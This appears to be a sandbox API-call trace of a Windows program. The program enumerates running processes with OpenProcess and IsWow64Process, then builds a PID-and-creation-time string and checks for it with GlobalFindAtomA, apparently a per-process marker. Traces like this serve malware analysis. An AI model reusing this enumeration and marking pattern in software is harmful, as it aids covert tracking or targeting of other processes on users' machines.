	[0113.580] CloseHandle (hObject=0x690) returned 1
	[0113.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0113.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0113.654] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0113.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0113.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0113.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0113.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0113.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0113.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0113.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0113.659] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0113.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0113.660] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0113.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0113.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0113.661] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0113.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0113.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0113.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0113.708] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.708] CloseHandle (hObject=0x698) returned 1
	[0113.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0113.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0113.708] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0113.708] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.708] CloseHandle (hObject=0x698) returned 1
	[0113.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0113.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0113.709] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.709] CloseHandle (hObject=0x698) returned 1
	[0113.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0113.709] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.709] CloseHandle (hObject=0x698) returned 1
	[0113.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0113.709] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.709] CloseHandle (hObject=0x698) returned 1
	[0113.709] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0113.709] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.709] CloseHandle (hObject=0x698) returned 1
	[0113.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0113.710] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.710] CloseHandle (hObject=0x698) returned 1
	[0113.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0113.710] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.710] CloseHandle (hObject=0x698) returned 1
	[0113.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0113.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0113.710] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.710] CloseHandle (hObject=0x698) returned 1
	[0113.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0113.710] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.710] CloseHandle (hObject=0x698) returned 1
	[0113.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0113.711] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.711] CloseHandle (hObject=0x698) returned 1
	[0113.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0113.711] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.711] CloseHandle (hObject=0x698) returned 1
	[0113.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0113.711] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.711] CloseHandle (hObject=0x698) returned 1
	[0113.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0113.711] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.711] CloseHandle (hObject=0x698) returned 1
	[0113.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0113.711] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.712] CloseHandle (hObject=0x698) returned 1
	[0113.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0113.712] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.712] CloseHandle (hObject=0x698) returned 1
	[0113.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0113.712] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.712] CloseHandle (hObject=0x698) returned 1
	[0113.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0113.712] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.712] CloseHandle (hObject=0x698) returned 1
	[0113.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0113.712] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.712] CloseHandle (hObject=0x698) returned 1
	[0113.713] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0113.713] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.713] CloseHandle (hObject=0x698) returned 1
	[0113.713] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0113.713] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.713] CloseHandle (hObject=0x698) returned 1
	[0113.713] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0113.713] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.713] CloseHandle (hObject=0x698) returned 1
	[0113.713] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0113.713] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.713] CloseHandle (hObject=0x698) returned 1
	[0113.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0113.714] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.714] CloseHandle (hObject=0x698) returned 1
	[0113.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0113.714] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.714] CloseHandle (hObject=0x698) returned 1
	[0113.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0113.714] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.714] CloseHandle (hObject=0x698) returned 1
	[0113.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0113.714] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.714] CloseHandle (hObject=0x698) returned 1
	[0113.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0113.714] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.714] CloseHandle (hObject=0x698) returned 1
	[0113.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0113.715] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.715] CloseHandle (hObject=0x698) returned 1
	[0113.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0113.715] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.715] CloseHandle (hObject=0x698) returned 1
	[0113.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0113.715] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.715] CloseHandle (hObject=0x698) returned 1
	[0113.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0113.716] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0113.716] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0113.716] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0113.716] wsprintfA (in: param_1=0x3993498, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0113.716] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0113.717] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0113.717] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0113.717] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0113.717] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0113.717] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0113.840] CloseHandle (hObject=0x698) returned 1
	[0113.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0113.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0113.840] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.841] CloseHandle (hObject=0x698) returned 1
	[0113.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0113.841] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.841] CloseHandle (hObject=0x698) returned 1
	[0113.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0113.841] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.841] CloseHandle (hObject=0x698) returned 1
	[0113.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0113.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0113.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0113.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0113.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0113.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0113.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0113.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0113.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0113.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0113.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0113.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0113.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0113.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0113.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0113.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0113.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0113.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0113.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x698
	[0113.969] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.969] CloseHandle (hObject=0x698) returned 1
	[0113.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0113.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0113.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x698
	[0113.970] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.970] CloseHandle (hObject=0x698) returned 1
	[0113.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0113.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x698
	[0113.970] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.970] CloseHandle (hObject=0x698) returned 1
	[0113.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x698
	[0113.970] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.970] CloseHandle (hObject=0x698) returned 1
	[0113.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x698
	[0113.971] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.971] CloseHandle (hObject=0x698) returned 1
	[0113.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x698
	[0113.971] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.971] CloseHandle (hObject=0x698) returned 1
	[0113.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x698
	[0113.972] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.972] CloseHandle (hObject=0x698) returned 1
	[0113.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x698
	[0113.972] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.972] CloseHandle (hObject=0x698) returned 1
	[0113.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0113.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x698
	[0113.973] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.973] CloseHandle (hObject=0x698) returned 1
	[0113.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x698
	[0113.973] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.973] CloseHandle (hObject=0x698) returned 1
	[0113.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x698
	[0113.973] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.973] CloseHandle (hObject=0x698) returned 1
	[0113.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x698
	[0113.973] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.973] CloseHandle (hObject=0x698) returned 1
	[0113.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x698
	[0113.973] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.974] CloseHandle (hObject=0x698) returned 1
	[0113.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x698
	[0113.974] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.974] CloseHandle (hObject=0x698) returned 1
	[0113.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x698
	[0113.974] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.974] CloseHandle (hObject=0x698) returned 1
	[0113.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x698
	[0113.974] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.974] CloseHandle (hObject=0x698) returned 1
	[0113.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x698
	[0113.974] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.974] CloseHandle (hObject=0x698) returned 1
	[0113.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x698
	[0113.975] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.975] CloseHandle (hObject=0x698) returned 1
	[0113.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x698
	[0113.975] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.975] CloseHandle (hObject=0x698) returned 1
	[0113.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x698
	[0113.975] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.975] CloseHandle (hObject=0x698) returned 1
	[0113.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x698
	[0113.975] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.975] CloseHandle (hObject=0x698) returned 1
	[0113.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x698
	[0113.975] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.976] CloseHandle (hObject=0x698) returned 1
	[0113.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x698
	[0113.976] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.976] CloseHandle (hObject=0x698) returned 1
	[0113.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x698
	[0113.976] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.976] CloseHandle (hObject=0x698) returned 1
	[0113.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x698
	[0113.976] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.977] CloseHandle (hObject=0x698) returned 1
	[0113.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x698
	[0113.977] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.977] CloseHandle (hObject=0x698) returned 1
	[0113.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x698
	[0113.977] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.977] CloseHandle (hObject=0x698) returned 1
	[0113.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x698
	[0113.977] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.977] CloseHandle (hObject=0x698) returned 1
	[0113.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x698
	[0113.977] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.977] CloseHandle (hObject=0x698) returned 1
	[0113.978] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x698
	[0113.978] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.978] CloseHandle (hObject=0x698) returned 1
	[0113.978] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0113.978] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.978] CloseHandle (hObject=0x698) returned 1
	[0113.978] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x698
	[0113.978] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0113.984] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0113.984] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0113.984] wsprintfA (in: param_1=0x3993c40, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0113.985] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0113.985] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0113.985] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0113.985] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0113.985] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0113.985] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0113.992] CloseHandle (hObject=0x698) returned 1
	[0113.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0113.992] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x698
	[0113.993] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.993] CloseHandle (hObject=0x698) returned 1
	[0113.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x698
	[0113.993] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.993] CloseHandle (hObject=0x698) returned 1
	[0113.993] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x698
	[0113.993] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0113.993] CloseHandle (hObject=0x698) returned 1
	[0114.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0114.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0114.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0114.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0114.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0114.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0114.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0114.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0114.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0114.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0114.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0114.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0114.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0114.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0114.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0114.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0114.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0114.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
